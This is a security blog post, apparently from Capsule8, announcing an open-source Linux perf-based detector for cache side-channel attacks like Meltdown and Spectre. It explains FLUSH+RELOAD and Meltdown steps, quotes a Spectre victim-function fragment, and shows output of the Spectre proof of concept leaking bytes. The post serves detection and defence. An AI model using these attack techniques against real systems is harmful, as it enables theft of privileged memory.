Part Two: Detecting Meltdown and Spectre by Detecting Cache Side Channels

Last week, we delivered an open source detector for some variants of the Meltdown attack and promised that we’d provide a more generic detection for more variants of Meltdown and Spectre. Today we are delivering on that promise with the introduction of our Apache-licensed cache side channel detector for Linux.

In addition to releasing that detector, we are urging a broadening of the conversation beyond mitigation to also focus on accurate and effective detection. We believe that solely focusing on expensive mitigation steps can leave many environments vulnerable while they are in the process of updating their systems. For most organizations, Linux kernel security updates are among the most disruptive security updates and require a large amount of planning and time to execute. Lightweight, non-disruptive, and reliable detection can provide effective protection against newly disclosed vulnerabilities where attackers can move much faster than defenders can.

The Case for Detection

It’s been an eventful week in many respects. Seeing the major cloud providers upgrade their entire infrastructure so seamlessly was a huge positive, even though there was a big downside that was well captured in this tweet:

Some sources indicate that the performance issues in the Kernel Page Table Isolation (KPTI) mitigation strategy are overblown, especially on recent hardware. However, additional reputable sources argue that the technique does have a practical impact, dependent on the application, possibly landing in the range of 5% for most workloads, with some instances being significantly higher (especially workloads with lots of calls into the kernel).

To make matters worse, none of the existing mitigations are complete mitigations to the problem. For example, Google warns that despite their exhaustive efforts some applications could require mitigations, such as web browsers that execute remotely provided untrusted code. There’s also the strong possibility that relatives of the attack could circumvent mitigations, such as side-channel attacks which are not always well handled by the industry despite the general understanding that modern CPU architectures have significant potential for such problems.

Many environments without mitigation could, in practice, be very low risk for a practical attack. If the workload doesn’t execute untrusted code and is fairly locked down, then the performance hit of the mitigations seems like a high cost for little to no benefit (Note: an unmitigated machine would be at high risk of an unprivileged remote execution vulnerability turning into full root).

Additionally, while it was inspirational to see cloud providers able to move so quickly, there is going to be a massively long tail on upgrades. Most organizations will never be able to upgrade their fleet that quickly. Their production environments often run old software on old OSs, where any upgrade comes with a tremendous amount of risk. It’s likely more cost effective to focus on detection and response strategies, rather than full mitigation, particularly when the probability of a practical attack is low for the environment.

For Spectre and Meltdown, we believe some use cases warrant focusing on detection rather than full mitigation. First, it’s reasonable to believe that detection will often be more efficient than mitigation. For instance, our simplistic detector below uses 1-3% of a single CPU core for typical workloads, and its worst case in our testing was not higher than 10% of a single CPU core on a very heavy load. This results in minimal overhead to workloads.

Additional performance overhead generally translates to additional cost for someone. However, the detection of false positives can lead to additional cost too, so the effectiveness of the detection has to be considered.

Still, there should be hope that generic strategies looking for anomalies could detect a potentially larger class of cache side channel attacks than we previously knew how to exploit.     Again, as long as the detection doesn’t create a huge burden due to falsing, broader detection should be valuable.

If a workload seems unlikely to be practically exploitable without other major failures, detection could certainly be preferable. However, we feel that even in cases where there’s more legitimate risk, detection is still a decent alternative, especially if a response can be automated. For instance, it should often be feasible to detect and shut down an offending process before sensitive information is fully exposed.

Additionally, where performance truly isn’t an issue, high-risk environments should be looking at a “belt-and-suspenders” approach where there is both mitigation and detection, in case the mitigation is not enough.  

Certainly, detection is critical to dealing with zero-day vulnerabilities. Assuming a mechanism like KPTI will get rid of all cache-related side channel attacks might turn out to be as wrong as assuming that ASLR with good randomization would be impossible to circumvent.

To that end, we wanted to make one of our more straightforward detection techniques available to the Linux world to help manage the problem for workloads where existing mitigations are not a good match.

Our detection strategy seems to give highly accurate results in practice, meaning low amounts of false positives and false negatives.  But there are definitely trade-offs — we have tuned it so that small reads (under a cache line size, like the 40 bytes default size for the Spectre PoC in the original paper) under system load may be a false negative to ensure acceptable performance and that it is with the preference to generate a “low” severity false positive than miss a small read.

Please do let us know if you do find any cases where accuracy is suspect, as we have only tested with a handful of representative workloads.

Cache Side Channel Attacks

A common element to all of the published attacks for all three vulnerability variants of these attacks so far has been the use of cache timing attacks to leak the read speculatively read data to the attacker. In this section, we’ll briefly explain what they are and how they work in order to make it clear how their detection is important to detecting exploitation of these vulnerabilities.

Cache timing attacks take advantage of a few aspects of modern processors. The first and foremost is that the time required to access a memory address in the cache is significantly less (usually 80 or less clock cycles) than reading a memory address not in the cache (at least 200 clock cycles). In addition, there is a last-level cache on multi-core processes that is shared across all cores which is affected by both privileged and unprivileged processes. Finally, multiple memory addresses map to the same physical storage in the cache in a deterministic way. This sharing and overloaded memory address mappings are what allows an unprivileged process on one CPU core to discern the contents of privileged memory that was loaded into the cache by a privileged process running on another CPU core.

Given these facts, Cache side channel attacks work by putting the cache into a known state and then measuring time of operations to determine the change in cache’s state. This all works because of the overloaded associativity between addresses and cache lines. To make this concrete let’s start with an example of the FLUSH+RELOAD technique.


The attack described in the FLUSH+RELOAD paper by Yuval Yarom and Katrina Falkner, works in four simple steps:

  1. Flush an address that maps to a chosen cache line
  2. Wait for sometime for your victim process to do something
  3. Time accessing the address again
    1. If it’s slow then an address that mapped to yours was not accessed by the victim
    2. If it’s fast then an address that mapped to yours was accessed by the victim

In the context of the original paper the authors assumed that there would be shared code and by inferring access patterns to shared code were able to determine RSA keys. In the case of Meltdown, this is described in section 4.2 of the paper but it works like this:

  1. Attacker allocates an array of bytes in userspace and flush their contents from the cache
  2. Then using code that gets executed speculatively, access some memory that’s normally inaccessible due to page permissions (e.g. kernel memory) and store it in a register.  
  3. The speculatively executed code checks a bit at a given range,
    1. if it’s 1 then access an entry in the array from step 1
    2. If it’s a 0 then don’t access any memory
  4. The attacker’s code times accessing entries in the array from step 1
    1. If an entry is fast to access (less than 80 nanoseconds), then the bit at the inaccessible address was a 1
    2. Otherwise if not entries are fast then the bit was a zero
  5. Repeat to get rid of noise that might come from context switches

The Achilles heel in FLUSH+RELOAD has been that it’s using cache misses to signal 0s, which by its very nature causes LLC counters to increment by large margins.

In the case of Spectre, they’re able to read out a byte at a time by performing a write via their victim function:

uint8_t temp;

void victim_function(size_t x) {

  if (x < array1_size) {

    temp &= array2[array1[x] * 512];



After successive calls this causes the branch to be taken speculatively which causes two out-of-bounds accesses.

The first one to generates an address, the second uses that generated address to read from. This read causes a cache line to be filled. Since the first address is actually victim process data determining which cache line in the array2 access was filled is equivalent to leaking the byte value. While this does not directly use cache misses to transmit data, it does cause significant amounts of cache misses by not accessing memory linearly.

Detecting Cache Side Channels with Linux Perf

Right after the vulnerabilities were announced last week, we started discussing whether we could reliably detect their exploitation and our own Pete Markowsky suggested that the counters for Last-Level Cache misses may provide a strong signal that a cache side channel was being used to leak the data (as was also noticed by the researchers at Endgame). These types of side channel attacks are used to exploit vulnerabilities like Meltdown and Spectre and are often also utilized in exploiting other hardware-level vulnerabilities like Rowhammer.

The Linux Perf subsystem performs system and software profiling using both software and hardware performance counters. It is also the built-in interface to the Intel Performance Counters. Since we already wrote our own 100% pure Go interface to Perf in our open-source Capsule8 Sensor, it was trivial to make the changes necessary to support accessing hardware-based events through it as well.

Our detection strategy for cache side channels involves setting up the LLC Loads and LLC Load Misses hardware cache counters on each logical CPU and configuring Perf to record a sample every 10,000 LLC loads. Each sample includes the logical CPU number, active process ID and thread ID, sample time, and cumulative count of LLC Loads and LLC Load Misses. This is a very low-impact way to continuously calculate and monitor the cache miss rate on an entire system. In our testing, running this detection consumes an average of 3% CPU on one core, peaking at 10%, during our simulated CPU and cache intensive workloads.

Our detector readily detects the Spectre proof-of-concept published in the original paper, as shown below:

$ sudo ./cache_side_channel 

I0109 02:33:56.943214   13788 main.go:61] Starting Capsule8 cache side channel detector

I0109 02:33:56.944320   13788 main.go:109] Monitoring for cache side channels

I0109 02:33:59.609506   13788 main.go:156] cpu=4 pid=13838 tid=13838 LLCLoadMissRate=0.9551


$ ./spectre_poc

Reading 40 bytes:

Reading at malicious_x = 0xffffffffffdd75c8... Success: 0x54=’T’ score=2 

Reading at malicious_x = 0xffffffffffdd75c9... Success: 0x68=’h’ score=2 

Reading at malicious_x = 0xffffffffffdd75ca... Success: 0x65=’e’ score=2 

Reading at malicious_x = 0xffffffffffdd75cb... Success: 0x20=’ ’ score=2 

Reading at malicious_x = 0xffffffffffdd75cc... Success: 0x4D=’M’ score=2 

Reading at malicious_x = 0xffffffffffdd75cd... Success: 0x61=’a’ score=2 

Reading at malicious_x = 0xffffffffffdd75ce... Success: 0x67=’g’ score=2 

Reading at malicious_x = 0xffffffffffdd75cf... Success: 0x69=’i’ score=2 

Reading at malicious_x = 0xffffffffffdd75d0... Success: 0x63=’c’ score=2 


Our detector is even more effective at detecting cache side channels the more data that they transfer, so running the published PoC with a larger length specified on the command-line will generate significantly noisier (in a good way) detection alerts. The more data that is transferred through the cache side channel, the stronger the signal from our detector that something malicious may be going on.

Our detector’s full source code is available under an Apache 2.0 license as an example in our open-source repository.